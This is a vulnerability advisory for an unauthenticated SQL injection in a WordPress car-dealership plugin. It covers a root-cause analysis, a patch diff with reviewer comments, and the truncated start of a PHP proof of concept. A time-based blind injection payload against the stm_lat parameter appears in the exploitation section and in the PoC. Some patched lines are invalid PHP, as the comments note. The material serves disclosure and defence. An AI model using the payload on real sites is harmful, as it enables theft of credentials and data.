Published: June 28, 2026

CVE-2026-54812: Motors – Car Dealership & Classified Listings Plugin <= 1.4.109 Unauthenticated SQL Injection PoC, Patch Analysis & Rule

Severity: High (CVSS 7.5)
CWE: CWE-89 (SQL Injection)
Vulnerable Version: 1.4.109
Patched Version: 1.4.110
Disclosed: June 16, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-54812:

This vulnerability allows unauthenticated actors to perform SQL injection via the Motors – Car Dealership & Classified Listings Plugin for WordPress (versions up to 1.4.109). The critical flaw stems from insufficient input sanitization in location-based user queries, ultimately enabling an attacker to inject arbitrary SQL statements that can extract sensitive data from the database (CVSS 7.5).

Root Cause: The vulnerability originates in the `fields_by_location`, `join_by_location`, `having_by_location`, and `order_by_location` methods within `/includes/class/User/Model/UserModel.php`. These methods originally relied on `empty()` checks for the latitude, longitude, and radius parameters. `empty()` returns true for zero or '0', but it says nothing about whether a non-empty value is a valid numeric or float format. Non-numeric, malicious strings therefore passed the check and were interpolated directly into the SQL query string (see `$formula` on line 196 and `HAVING distance <= $radius` on line 223). The user-supplied values arrive from `UserController.php` via `apply_filters('stm_listings_input', null, 'stm_lat')` and the related inputs, which previously did not enforce float validation.

Exploitation: An unauthenticated attacker can craft a GET or POST request to any endpoint that triggers the user listing or dealer search functionality (e.g., via AJAX or the front-end dealer list) and supply specially crafted values for `stm_lat`, `stm_lng`, or the radius parameter. For example, by passing `stm_lat=1 AND (SELECT 1 FROM (SELECT SLEEP(5))a)` as a parameter, the unsanitized value reaches the SQL query. The attacker can then use time-based blind SQL injection or error-based techniques to enumerate database contents. Because the plugin does not require authentication for this search functionality, any visitor to the site can launch the attack.

Patch Analysis: The patch introduces two primary changes: (1) In `UserModel.php`, each method now uses `filter_var($lat, FILTER_VALIDATE_FLOAT)` before accepting the value. If validation fails, the method returns an empty string, preventing any SQL construction with the malicious input. The variables are also explicitly cast to `(float)`. (2) In `UserController.php`, the incoming parameters are now filtered through `filter_var(…, FILTER_VALIDATE_FLOAT)` before being passed to the model methods. The condition that triggers the location-based query was changed from `! empty( floatval( $lat ) )` to `false !== $lat && false !== $lng`, which properly checks that the filter succeeded. These changes ensure only numeric float values enter the SQL context, effectively neutralizing SQL injection attempts.
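The following script is an added illustration of the root cause and of the patched gate; it is example code written for this write-up, not the plugin's own source. The two gate functions are mine, the local `having_by_location()` mirrors the logic of the patched method as it appears in the diff below, and the sample inputs are constructed.

```php
<?php
// Added example (not the plugin's code): compares the pre-patch gate, empty(),
// with the post-patch gate, filter_var(FILTER_VALIDATE_FLOAT), on constructed
// inputs, then builds the HAVING clause the way the patched
// having_by_location() does. Run with: php gate_check.php

/**
 * Pre-patch gate: a value reaches the query unless empty() is true.
 * empty() says nothing about the value being numeric.
 */
function accepted_by_empty_gate( $value ): bool {
    return ! empty( $value );
}

/**
 * Post-patch gate: a value is accepted only if it parses as a float.
 * FILTER_VALIDATE_FLOAT returns false for anything else.
 */
function accepted_by_float_gate( $value ): bool {
    return false !== filter_var( $value, FILTER_VALIDATE_FLOAT );
}

/**
 * Hardened clause builder mirroring the patched having_by_location():
 * validate first, then cast, so only a numeric literal is interpolated.
 * Returns '' when either input is not a float.
 */
function having_by_location( $lat, $radius ): string {
    if ( false === filter_var( $lat, FILTER_VALIDATE_FLOAT )
        || false === filter_var( $radius, FILTER_VALIDATE_FLOAT ) ) {
        return '';
    }
    $radius = (float) $radius;
    return "HAVING distance <= $radius";
}

// Constructed inputs: what a request parameter such as stm_lat might carry.
$samples = array(
    '43.65',     // normal coordinate
    '0',         // equator: empty() rejects it, the float gate accepts it
    '',          // missing parameter
    '1e3',       // exponent form is still a float
    '1 OR 1=1',  // SQL fragment: empty() lets it through, the float gate stops it
    '43.65abc',  // numeric prefix with trailing garbage
);

printf( "%-14s %-14s %s\n", 'empty() gate', 'float gate', 'input' );
foreach ( $samples as $s ) {
    printf(
        "%-14s %-14s %s\n",
        accepted_by_empty_gate( $s ) ? 'ACCEPTS' : 'rejects',
        accepted_by_float_gate( $s ) ? 'accepts' : 'REJECTS',
        var_export( $s, true )
    );
}

echo "\n";
echo "having_by_location('43.65', '100')        => ",
    var_export( having_by_location( '43.65', '100' ), true ), "\n";
echo "having_by_location('43.65', '100 OR 1=1') => ",
    var_export( having_by_location( '43.65', '100 OR 1=1' ), true ), "\n";
```

The '0' row is the instructive one: `empty()` wrongly rejects a legitimate coordinate on the equator or prime meridian while accepting any non-empty SQL fragment, and the float filter does the opposite. Even after validation, the patched code still interpolates the value into the query string; in WordPress the more robust pattern is `$wpdb->prepare()` with a `%f` placeholder, which does not depend on an upstream gate being applied by every caller.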

Impact: A successful exploit enables an unauthenticated attacker to read arbitrary data from the WordPress database. This includes user credentials (hashed passwords), email addresses, session tokens, post content, and sensitive configuration details. The attacker could obtain administrative credentials, leading to full site compromise. Additionally, the attacker might be able to leverage the database access to modify or delete existing data, or to inject malicious code into the site through stored procedures or other database features.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff
--- a/motors-car-dealership-classified-listings/includes/actions.php
+++ b/motors-car-dealership-classified-listings/includes/actions.php
@@ -984,28 +984,80 @@

 		$response = array( 'status' => 'Error' );

-		$car_id = intval( filter_var( wp_unslash( $_POST['car_id'] ), FILTER_SANITIZE_NUMBER_INT ) );
-		$price  = floatval( filter_var( wp_unslash( $_POST['price'] ), FILTER_SANITIZE_NUMBER_FLOAT ) );
+		$car_id = isset( $_POST['car_id'] ) ? absint( wp_unslash( $_POST['car_id'] ) ) : 0;

-		if ( ! empty( $car_id ) && ! empty( $price ) ) {
+		if ( ! empty( $car_id ) && stm_is_listing_available_for_online_purchase( $car_id ) ) {
+			$price = stm_get_listing_online_purchase_price( $car_id );

-			update_post_meta( $car_id, '_price', $price );
-			update_post_meta( $car_id, 'is_sell_online_status', 'in_cart' );
+			if ( $price > 0 ) {
+				update_post_meta( $car_id, '_price', wc_format_decimal( $price ) );
+				update_post_meta( $car_id, 'is_sell_online_status', 'in_cart' );

-			$checkout_url = wc_get_checkout_url() . '?add-to-cart=' . $car_id;
+				$checkout_url = add_query_arg( 'add-to-cart', $car_id, wc_get_checkout_url() );

-			$response = array(
-				'status'       => 'success',
-				'redirect_url' => $checkout_url,
-			);
+				$response = array(
+					'status'       => 'success',
+					'redirect_url' => $checkout_url,
+				);

-			wp_send_json( $response );
+				wp_send_json( $response );
+			}
 		}

 		wp_send_json( $response );
 	}
 }

+if ( ! function_exists( 'stm_get_online_purchase_listing_post_types' ) ) {
+	function stm_get_online_purchase_listing_post_types() {
+		$post_types = array( apply_filters( 'stm_listings_post_type', 'listings' ) );
+
+		if ( class_exists( 'STMMultiListing' ) ) {
+			$slugs = STMMultiListing::stm_get_listing_type_slugs();
+
+			if ( ! empty( $slugs ) ) {
+				$post_types = array_merge( $post_types, $slugs );
+			}
+		}
+
+		return array_unique( array_filter( $post_types ) );
+	}
+}
+
+if ( ! function_exists( 'stm_is_listing_available_for_online_purchase' ) ) {
+	function stm_is_listing_available_for_online_purchase( $listing_id ) {
+		if ( ! in_array( get_post_type( $listing_id ), stm_get_online_purchase_listing_post_types(), true ) ) {
+			return false;
+		}
+
+		if ( 'publish' !== get_post_status( $listing_id ) ) {
+			return false;
+		}
+
+		if ( empty( get_post_meta( $listing_id, 'car_mark_woo_online', true ) ) ) {
+			return false;
+		}
+
+		if ( ! empty( get_post_meta( $listing_id, 'car_mark_as_sold', true ) ) ) {
+			return false;
+		}
+
+		return true;
+	}
+}
+
+if ( ! function_exists( 'stm_get_listing_online_purchase_price' ) ) {
+	function stm_get_listing_online_purchase_price( $listing_id ) {
+		$price = get_post_meta( $listing_id, 'sale_price', true );
+
+		if ( empty( $price ) ) {
+			$price = get_post_meta( $listing_id, 'price', true );
+		}
+
+		return (float) wc_format_decimal( $price );
+	}
+}
+
 //Trade in form ajax
 if ( ! function_exists( 'handle_stm_trade_in_form' ) ) {
 	function handle_stm_trade_in_form() {
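Review bot: `stm_get_online_purchase_listing_post_types()` is a line-for-line duplicate of `stm_add_a_car_listing_post_types()` added to vehicle_functions.php in this same patch; keep one helper (for example in helpers.php) and call it from both places, otherwise the two lists will drift the next time a post type is added. Taking the price from post meta via `stm_get_listing_online_purchase_price()` instead of `$_POST['price']` is the right call; the `$price > 0` failure path, however, falls through to the generic `'status' => 'Error'` response with no message, so a listing with no configured price is indistinguishable from a bad request on the client side.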
--- a/motors-car-dealership-classified-listings/includes/class/User/Model/UserModel.php
+++ b/motors-car-dealership-classified-listings/includes/class/User/Model/UserModel.php
@@ -191,9 +191,13 @@
 	}

 	public function fields_by_location( $lat, $lng ) {
-		if ( empty( $lat ) ) {
+		if ( false === filter_var( $lat, FILTER_VALIDATE_FLOAT ) || false === filter_var( $lng, FILTER_VALIDATE_FLOAT ) ) {
 			return '';
 		}
+
+		$lat = (float) $lat;
+		$lng = (float) $lng;
+
 		$formula = "6378.137 * ACOS(COS(RADIANS(stm_lat_prefix.meta_value))
 			* COS(RADIANS($lat))
 			* COS(RADIANS(stm_lng_prefix.meta_value) - RADIANS($lng)) + SIN(RADIANS(stm_lat_prefix.meta_value))
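Review bot: the gate is correct, but `$lat` and `$lng` are still interpolated into `$formula` by string concatenation, so safety depends on every caller passing through this check. `$wpdb->prepare()` with `%f` placeholders would make the statement safe regardless of input handling, and would also sidestep the PHP < 8.0 behaviour where float-to-string conversion follows the process locale and can emit `12,5` instead of `12.5` inside the SQL.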
@@ -203,7 +207,7 @@
 	}

 	public function join_by_location( $lat ) {
-		if ( empty( $lat ) ) {
+		if ( false === filter_var( $lat, FILTER_VALIDATE_FLOAT ) ) {
 			return '';
 		}
 		$join  = " JOIN $this->user_meta_table AS stm_lat_prefix ON (u.ID = stm_lat_prefix.user_id AND stm_lat_prefix.meta_key = 'stm_dealer_location_lat')";
@@ -213,15 +217,17 @@
 	}

 	public function having_by_location( $lat, $radius ) {
-		if ( empty( $lat ) ) {
+		if ( false === filter_var( $lat, FILTER_VALIDATE_FLOAT ) || false === filter_var( $radius, FILTER_VALIDATE_FLOAT ) ) {
 			return '';
 		}

+		$radius = (float) $radius;
+
 		return "HAVING distance <= $radius";
 	}

 	public function order_by_location( $lat ) {
-		if ( empty( $lat ) ) {
+		if ( false === filter_var( $lat, FILTER_VALIDATE_FLOAT ) ) {
 			return '';
 		}

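Review bot: `having_by_location()` accepts any float for `$radius`, including `0` and negative values, which produce `HAVING distance <= -1` and an empty result; the controller already falls back to 5000 when its own `$radius` is not `> 0`, so applying the same `> 0` rule here keeps the model safe for callers other than `UserController`. Also, each of the four `*_by_location()` methods re-runs `filter_var()` on the same `$lat`; validating once at the entry point and passing typed floats would reduce the number of places a future edit can get wrong.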
--- a/motors-car-dealership-classified-listings/includes/class/User/UserController.php
+++ b/motors-car-dealership-classified-listings/includes/class/User/UserController.php
@@ -64,12 +64,12 @@
 				}
 			}

-			$lat    = apply_filters( 'stm_listings_input', null, 'stm_lat' );
-			$lng    = apply_filters( 'stm_listings_input', null, 'stm_lng' );
-			$radius = apply_filters( 'motors_vl_get_nuxy_mod', '', 'distance_search' );
-			$radius = ( ! empty( $radius ) ) ? $radius : 5000;
+			$lat    = filter_var( apply_filters( 'stm_listings_input', null, 'stm_lat' ), FILTER_VALIDATE_FLOAT );
+			$lng    = filter_var( apply_filters( 'stm_listings_input', null, 'stm_lng' ), FILTER_VALIDATE_FLOAT );
+			$radius = filter_var( apply_filters( 'motors_vl_get_nuxy_mod', '', 'distance_search' ), FILTER_VALIDATE_FLOAT );
+			$radius = ( false !== $radius && $radius > 0 ) ? $radius : 5000;

-			if ( empty( $left_join ) && ! empty( floatval( $lat ) ) && ! empty( floatval( $lng ) ) ) {
+			if ( empty( $left_join ) && false !== $lat && false !== $lng ) {
 				$include_users = $model->get_filtered_users_by_location( $model->fields_by_location( $lat, $lng ), $model->join_by_location( $lat ), $model->having_by_location( $lat, $radius ), $model->order_by_location( $lat ) );
 			} elseif ( ! empty( $left_join ) && ! empty( $where ) ) {
 				$include_users = $model->get_filtered_users( $left_join, $where, $model->fields_by_location( $lat, $lng ), $model->join_by_location( $lat ), $model->having_by_location( $lat, $radius ), $model->order_by_location( $lat ) );
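Review bot: `FILTER_VALIDATE_FLOAT` returns `false` on failure, and the `elseif` branch passes that `false` straight into `fields_by_location()`, `join_by_location()` and the others; this is safe only because `filter_var( false, FILTER_VALIDATE_FLOAT )` is itself `false`, so the methods return `''`. Worth a comment, since a later `(float)` cast at the call site would silently turn the sentinel into `0.0`. Note also the behaviour change: the old `! empty( floatval( $lat ) )` rejected a latitude or longitude of exactly 0, while `false !== $lat` now accepts it, which is correct but belongs in the changelog.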
--- a/motors-car-dealership-classified-listings/includes/helpers.php
+++ b/motors-car-dealership-classified-listings/includes/helpers.php
@@ -1337,7 +1337,7 @@
 		$page = 'inventory';

 		if ( isset( $_GET['page'] ) ) {
-			$page = sanitize_text_field( $_GET['page'] );
+			$page = sanitize_key( wp_unslash( $_GET['page'] ) );
 		}

 		if ( ! empty( $_GET['my_favourites'] ) ) {
--- a/motors-car-dealership-classified-listings/includes/templates.php
+++ b/motors-car-dealership-classified-listings/includes/templates.php
@@ -15,6 +15,12 @@
 	$located = false;

 	foreach ( (array) $templates as $template ) {
+		if ( ! stm_listings_is_safe_template_path( $template ) ) {
+			continue;
+		}
+
+		$template = ltrim( str_replace( '\', '/', $template ), '/' );
+
 		if ( substr( $template, - 4 ) !== '.php' ) {
 			$template .= '.php';
 		}
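Review bot: `str_replace( '\', '/', $template )` as shown is not valid PHP: the backslash escapes the closing quote, leaving the single-quoted string unterminated, so this file would fail to parse. The literal for a single backslash is `'\\'`. The same line appears in `stm_listings_is_safe_template_path()` below and needs the same fix.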
@@ -26,12 +32,18 @@
 		}

 		if ( ! ( $located ) ) {
-			if ( file_exists( realpath( apply_filters( 'stm_listings_template_file', STM_LISTINGS_PATH, $template ) . '/templates/' . $template ) ) ) {
-				$located = realpath( apply_filters( 'stm_listings_template_file', STM_LISTINGS_PATH, $template ) . '/templates/' . $template );
+			$template_base = realpath( apply_filters( 'stm_listings_template_file', STM_LISTINGS_PATH, $template ) . '/templates' );
+
+			if ( $template_base ) {
+				$template_path = realpath( $template_base . '/' . $template );
+
+				if ( $template_path && 0 === strpos( $template_path, $template_base . DIRECTORY_SEPARATOR ) && file_exists( $template_path ) ) {
+					$located = $template_path;
+				}
 			}
 		}

-		if ( file_exists( $located ) ) {
+		if ( $located && file_exists( $located ) ) {
 			break;
 		}
 	}
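Review bot: the `file_exists( $template_path )` test is redundant: `realpath()` returns `false` for a path that does not exist, so a truthy `$template_path` already implies existence. The prefix check against `$template_base . DIRECTORY_SEPARATOR` is the important part and is correct; it also rejects the case where the resolved path equals the base directory itself.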
@@ -40,6 +52,33 @@
 }

 /**
+ * Check that a requested template path cannot escape the listings template scope.
+ *
+ * @param mixed $template Template path.
+ *
+ * @return bool
+ */
+function stm_listings_is_safe_template_path( $template ) {
+	if ( ! is_string( $template ) || '' === $template || str_contains( $template, "" ) ) {
+		return false;
+	}
+
+	$template = str_replace( '\', '/', $template );
+
+	if ( preg_match( '#^[a-z][a-z0-9+.-]*://#i', $template ) || preg_match( '#^[a-z]:/#i', $template ) || 0 === strpos( $template, '//' ) ) {
+		return false;
+	}
+
+	foreach ( explode( '/', trim( $template, '/' ) ) as $path_part ) {
+		if ( '..' === $path_part ) {
+			return false;
+		}
+	}
+
+	return true;
+}
+
+/**
  * Load template
  *
  * @param $__template
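Review bot: `str_contains( $template, "" )` uses an empty needle, which `str_contains()` treats as contained in every string, so as written the function returns `false` for every template and nothing would ever load; the intended check is presumably for a NUL byte, `"\0"`. The `'\'` literal on the `str_replace` line is also an unterminated string (see the same issue in the earlier hunk) and should be `'\\'`. `str_contains()` itself needs PHP 8.0 or the polyfill WordPress has shipped since 5.9; confirm that matches the plugin's minimum supported versions.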
@@ -47,7 +86,11 @@
  */
 function stm_listings_load_template( $__template, $__vars = array() ) {
 	extract( $__vars );
-	include stm_listings_locate_template( $__template );
+	$__located = stm_listings_locate_template( $__template );
+
+	if ( $__located ) {
+		include $__located;
+	}
 }

 add_action( 'stm_listings_load_template', 'stm_listings_load_template', 10, 2 );
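Review bot: `extract( $__vars )` runs before `$__template` is resolved, so a `$__vars` array carrying a `__template` key overwrites the template name the caller intended. Resolving the path first, or using `extract( $__vars, EXTR_SKIP )`, removes the ordering hazard.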
--- a/motors-car-dealership-classified-listings/includes/vehicle_functions.php
+++ b/motors-car-dealership-classified-listings/includes/vehicle_functions.php
@@ -1611,12 +1611,10 @@
 		$user_id         = get_current_user_id();
 		$attachments_ids = ( isset( $_POST['attachments'] ) && ! empty( $attachments_ids ) ) ? array_map( 'sanitize_text_field', array_values( explode( ',', $_POST['attachments'] ) ) ) : array();

-		if ( ! empty( $post_id ) ) {
-			if ( ! empty( get_post_meta( $post_id, 'stm_car_user', true ) ) && intval( get_post_meta( $post_id, 'stm_car_user', true ) ) !== intval( $user_id ) ) {
-				/*User tries to add info to another car*/
-				wp_send_json( array( 'message' => esc_html__( 'You are trying to add car to another car user, or your session has expired, please sign in first', 'stm_vehicles_listing' ) ) );
-				exit;
-			}
+		if ( ! empty( $post_id ) && ! stm_current_user_can_manage_listing_media( $post_id ) ) {
+			/*User tries to add info to another car*/
+			wp_send_json( array( 'message' => esc_html__( 'You are trying to add car to another car user, or your session has expired, please sign in first', 'stm_vehicles_listing' ) ) );
+			exit;
 		}

 		$error    = true;
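Review bot: the unchanged line `$attachments_ids = ( isset( $_POST['attachments'] ) && ! empty( $attachments_ids ) ) ? ... : array();` tests `$attachments_ids` before it has been assigned, so the condition is always false and `$attachments_ids` is always `array()`; since this patch is tightening the media handlers, it is the moment to fix that (test `$_POST['attachments']` instead) and to run the result through `stm_filter_listing_media_attachments()` as the media handler now does. The new guard also skips the ownership check entirely when `$post_id` is empty; make sure the code after it cannot proceed without a post ID.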
@@ -1756,7 +1754,6 @@
 	}

 	add_action( 'wp_ajax_stm_ajax_add_a_car_images', 'stm_ajax_add_a_car_images' );
-	add_action( 'wp_ajax_nopriv_stm_ajax_add_a_car_images', 'stm_ajax_add_a_car_images' );
 }

 if ( ! function_exists( 'stm_listing_images_cron_event_start' ) ) {
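Review bot: removing the `wp_ajax_nopriv_` registration is right, but unauthenticated callers now get admin-ajax's default `0` body with HTTP 400 instead of the JSON `message` the front-end expects; check that the add-a-car JavaScript handles that response (for example by redirecting to login) rather than failing silently.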
@@ -1807,18 +1804,80 @@

 add_action( 'stm_add_a_car_images_schedule', 'stm_add_a_car_images_schedule' );

+if ( ! function_exists( 'stm_add_a_car_listing_post_types' ) ) {
+	function stm_add_a_car_listing_post_types() {
+		$post_types = array( apply_filters( 'stm_listings_post_type', 'listings' ) );
+
+		if ( class_exists( 'STMMultiListing' ) ) {
+			$slugs = STMMultiListing::stm_get_listing_type_slugs();
+
+			if ( ! empty( $slugs ) ) {
+				$post_types = array_merge( $post_types, $slugs );
+			}
+		}
+
+		return array_unique( array_filter( $post_types ) );
+	}
+}
+
+if ( ! function_exists( 'stm_current_user_can_manage_listing_media' ) ) {
+	function stm_current_user_can_manage_listing_media( $post_id ) {
+		if ( ! is_user_logged_in() || empty( $post_id ) ) {
+			return false;
+		}
+
+		if ( ! in_array( get_post_type( $post_id ), stm_add_a_car_listing_post_types(), true ) ) {
+			return false;
+		}
+
+		if ( current_user_can( 'edit_post', $post_id ) ) {
+			return true;
+		}
+
+		$listing_user_id = absint( get_post_meta( $post_id, 'stm_car_user', true ) );
+
+		return $listing_user_id && absint( get_current_user_id() ) === $listing_user_id;
+	}
+}
+
+if ( ! function_exists( 'stm_filter_listing_media_attachments' ) ) {
+	function stm_filter_listing_media_attachments( $attachments_ids, $post_id ) {
+		$filtered = array();
+
+		foreach ( $attachments_ids as $position => $attachment_id ) {
+			$attachment_id = absint( $attachment_id );
+
+			if ( ! $attachment_id || 'attachment' !== get_post_type( $attachment_id ) || ! wp_attachment_is_image( $attachment_id ) ) {
+				continue;
+			}
+
+			$attachment_parent = absint( wp_get_post_parent_id( $attachment_id ) );
+
+			if ( absint( $post_id ) !== $attachment_parent && ! current_user_can( 'edit_post', $attachment_id ) ) {
+				continue;
+			}
+
+			$filtered[ sanitize_key( $position ) ] = $attachment_id;
+		}
+
+		return $filtered;
+	}
+}
+
 if ( ! function_exists( 'stm_ajax_add_a_car_media' ) ) {
 	/**
 	 * Car media
 	 */
 	function stm_ajax_add_a_car_media() {
+		check_ajax_referer( 'stm_security_nonce', 'security' );
+
 		if ( apply_filters( 'stm_site_demo_mode', false ) ) {
 			wp_send_json( array( 'message' => esc_html__( 'Site is on demo mode', 'stm_vehicles_listing' ) ) );
 			exit;
 		}

-		$redirect_type = ( isset( $_POST['redirect_type'] ) ) ? $_POST['redirect_type'] : '';
-		$post_id       = intval( $_POST['post_id'] );
+		$redirect_type = ( isset( $_POST['redirect_type'] ) ) ? sanitize_key( wp_unslash( $_POST['redirect_type'] ) ) : '';
+		$post_id       = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : 0;
 		if ( ! $post_id ) {
 			/*No id passed from first ajax Call?*/
 			wp_send_json( array( 'message' => esc_html__( 'Some error occurred, try again later', 'stm_vehicles_listing' ) ) );
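Review bot: `stm_add_a_car_listing_post_types()` duplicates `stm_get_online_purchase_listing_post_types()` from actions.php; one shared helper would do. In `stm_filter_listing_media_attachments()`, `sanitize_key( $position )` can collapse two different positions onto the same key (it lowercases and strips characters), so a later entry silently overwrites an earlier one; since positions come from `media_position_*` suffixes, `absint( $position )` is the more precise choice if they are numeric. The added `check_ajax_referer()` call is in the right place, ahead of the demo-mode check.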
@@ -1828,21 +1887,21 @@
 		$user_id  = get_current_user_id();
 		$updating = $post_id && get_post_meta( $post_id, 'is_listing_updating', true );

-		if ( ! empty( $post_id ) ) {
-			if ( ! empty( get_post_meta( $post_id, 'stm_car_user', true ) ) && intval( get_post_meta( $post_id, 'stm_car_user', true ) ) !== intval( $user_id ) ) {
-				/*User tries to add info to another car*/
-				wp_send_json( array( 'message' => esc_html__( 'You are trying to add car to another car user, or your session has expired, please sign in first', 'stm_vehicles_listing' ) ) );
-				exit;
-			}
+		if ( ! stm_current_user_can_manage_listing_media( $post_id ) ) {
+			/*User tries to add info to another car*/
+			wp_send_json( array( 'message' => esc_html__( 'You are trying to add car to another car user, or your session has expired, please sign in first', 'stm_vehicles_listing' ) ) );
+			exit;
 		}

 		$attachments_ids = array();
 		foreach ( $_POST as $get_media_keys => $get_media_values ) {
 			if ( strpos( $get_media_keys, 'media_position_' ) !== false ) {
-				$attachments_ids[ str_replace( 'media_position_', '', $get_media_keys ) ] = intval( $get_media_values );
+				$attachments_ids[ str_replace( 'media_position_', '', $get_media_keys ) ] = absint( $get_media_values );
 			}
 		}

+		$attachments_ids = stm_filter_listing_media_attachments( $attachments_ids, $post_id );
+
 		$response = array(
 			'message' => '',
 			'post'    => $post_id,
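Review bot: `$user_id = get_current_user_id();` at the top of the hunk is no longer read in the shown code now that the ownership test lives in `stm_current_user_can_manage_listing_media()`; drop it if nothing later in the function uses it.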
@@ -1862,7 +1921,7 @@
 		);
 		$_thumbnail_id       = get_post_thumbnail_id( $post_id );
 		if ( $_thumbnail_id ) {
-			$current_attachments = array_unique( (array) array_unshift( $current_attachments, $_thumbnail_id ), SORT_NUMERIC );
+			$current_attachments = array_unique( array_merge( array( $_thumbnail_id ), $current_attachments ), SORT_NUMERIC );
 		}

 		if ( ! empty( $current_attachments ) ) {
@@ -2002,7 +2061,6 @@
 	}

 	add_action( 'wp_ajax_stm_ajax_add_a_car_media', 'stm_ajax_add_a_car_media' );
-	add_action( 'wp_ajax_nopriv_stm_ajax_add_a_car_media', 'stm_ajax_add_a_car_media' );
 }

 if ( ! function_exists( 'stm_media_random_affix' ) ) {
--- a/motors-car-dealership-classified-listings/stm_vehicles_listing.php
+++ b/motors-car-dealership-classified-listings/stm_vehicles_listing.php
@@ -8,7 +8,7 @@
  * License: GNU General Public License v2 or later
  * License URI: http://www.gnu.org/licenses/gpl-2.0.html
  * Text Domain: stm_vehicles_listing
- * Version: 1.4.109
+ * Version: 1.4.110
  */

 if ( ! defined( 'ABSPATH' ) ) {
@@ -50,7 +50,7 @@
 	define( 'STM_LISTINGS_URL', plugins_url( '', STM_LISTINGS_FILE ) );
 	define( 'STM_LISTINGS', 'stm_vehicles_listing' );
 	define( 'STM_THEME_V_NEED', '5.6.33' );
-	define( 'STM_LISTINGS_V', '1.4.109' );
+	define( 'STM_LISTINGS_V', '1.4.110' );
 	define( 'STM_LISTINGS_DB_VERSION', '1.0.0' );
 	define( 'STM_LISTINGS_IMAGES', STM_LISTINGS_URL . '/includes/admin/butterbean/images/' );
 }
--- a/motors-car-dealership-classified-listings/templates/user/private/user.php
+++ b/motors-car-dealership-classified-listings/templates/user/private/user.php
@@ -10,6 +10,19 @@

 $tpl = apply_filters( 'stm_account_current_page', '' );

+$allowed_private_pages = apply_filters(
+	'stm_user_private_allowed_pages',
+	array(
+		'inventory',
+		'favourite',
+		'settings',
+		'become-dealer',
+		'car-edit',
+		'password-recovery',
+	)
+);
+
+$tpl = sanitize_key( $tpl );

 ?>

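Review bot: the allow-list is exposed through the `stm_user_private_allowed_pages` filter, so a theme or add-on can re-open arbitrary template names; document that callbacks must only append fixed slugs (never request-derived values), and note that `sanitize_key()` lowercases, so entries must be lowercase to match.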
@@ -33,18 +46,19 @@
 			<div class="col-md-9 col-sm-12">
 				<div class="stm-user-private-main">
 					<?php
-					if ( isset( $_GET['page'] ) ) {
-						if ( apply_filters( 'get_saved_searches_page', sanitize_text_field( $_GET['page'] ) ) === 'saved-searches' ) {
+					if ( isset( $_GET['page'] ) ) { // phpcs:ignore WordPress.Security.NonceVerification.Recommended
+						$page = sanitize_key( wp_unslash( $_GET['page'] ) );
+						if ( apply_filters( 'get_saved_searches_page', $page ) === 'saved-searches' ) {
 							do_action( 'load_saved_searches_page' );
-						} else {
-							do_action( 'stm_listings_load_template', $path . $_GET['page'], array( 'user_id' => $user_id ) );
+						} elseif ( in_array( $page, $allowed_private_pages, true ) ) {
+							do_action( 'stm_listings_load_template', $path . $page, array( 'user_id' => $user_id ) );
 						}
 					} else {
 						if ( 'become-dealer' === $tpl && apply_filters( 'mvl_is_addon_enabled', false, 'forms_editor' ) ) {
 							// Load FormsEditor template directly, same as legacy template
 							// Template will get variables from its own scope (Config, etc.)
 							do_action( 'stm_listings_load_template', 'addons/forms-editor/page/partials/forms/become-dealer', array() );
-						} else {
+						} elseif ( in_array( $tpl, $allowed_private_pages, true ) ) {
 							do_action( 'stm_listings_load_template', $path . $tpl, array( 'user_id' => $user_id ) );
 						}
 					}
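Review bot: requests for a `page` outside the allow-list now render an empty main column with no feedback; returning a 404 or a short notice would make misconfigured links easier to diagnose. The `// phpcs:ignore WordPress.Security.NonceVerification.Recommended` annotation is appropriate here since the page parameter only selects a template and performs no state change.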
--- a/motors-car-dealership-classified-listings/vendor/composer/installed.php
+++ b/motors-car-dealership-classified-listings/vendor/composer/installed.php
@@ -3,7 +3,7 @@
         'name' => 'motors_vehicles_listing/plugin',
         'pretty_version' => 'dev-release',
         'version' => 'dev-release',
-        'reference' => 'd724753e86fcde174972faa023b00bc1c5513e6f',
+        'reference' => 'd8d629de91665cfcab1687b11cf9bcb664dc9ffb',
         'type' => 'library',
         'install_path' => __DIR__ . '/../../',
         'aliases' => array(),
@@ -13,7 +13,7 @@
         'motors_vehicles_listing/plugin' => array(
             'pretty_version' => 'dev-release',
             'version' => 'dev-release',
-            'reference' => 'd724753e86fcde174972faa023b00bc1c5513e6f',
+            'reference' => 'd8d629de91665cfcab1687b11cf9bcb664dc9ffb',
             'type' => 'library',
             'install_path' => __DIR__ . '/../../',
             'aliases' => array(),

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-54812 - Motors – Car Dealership & Classified Listings Plugin <= 1.4.109 - Unauthenticated SQL Injection

$target_url = 'http://example.com'; // Change this to the target WordPress site

// The vulnerable endpoint is any page that triggers the user/dealer search with location parameters.
// In many cases, this is the dealers list page or an AJAX handler.
// We will use a POST request to the plugin's AJAX endpoint.

$ajax_url = $target_url . '/wp-admin/admin-ajax.php';

// Step 1: Determine the correct AJAX action (this may vary by theme; common actions include 'stm_listings_load' or similar)
// For demonstration, we assume the action is 'stm_listings_load' which triggers the user model search.
$action = 'stm_listings_load'; // You may need to adjust this

// Step 2: Craft a payload that performs a time-based SQL injection
// The vulnerable parameter is 'stm_lat' (latitude). We inject a conditional sleep.
$payload = "1 AND (SELECT 1 FROM (SELECT SLEEP(5))a)";

$post_data = array(
    'action'  => $action,
    'stm_lat' => $payload,
    'stm_lng' => 0,
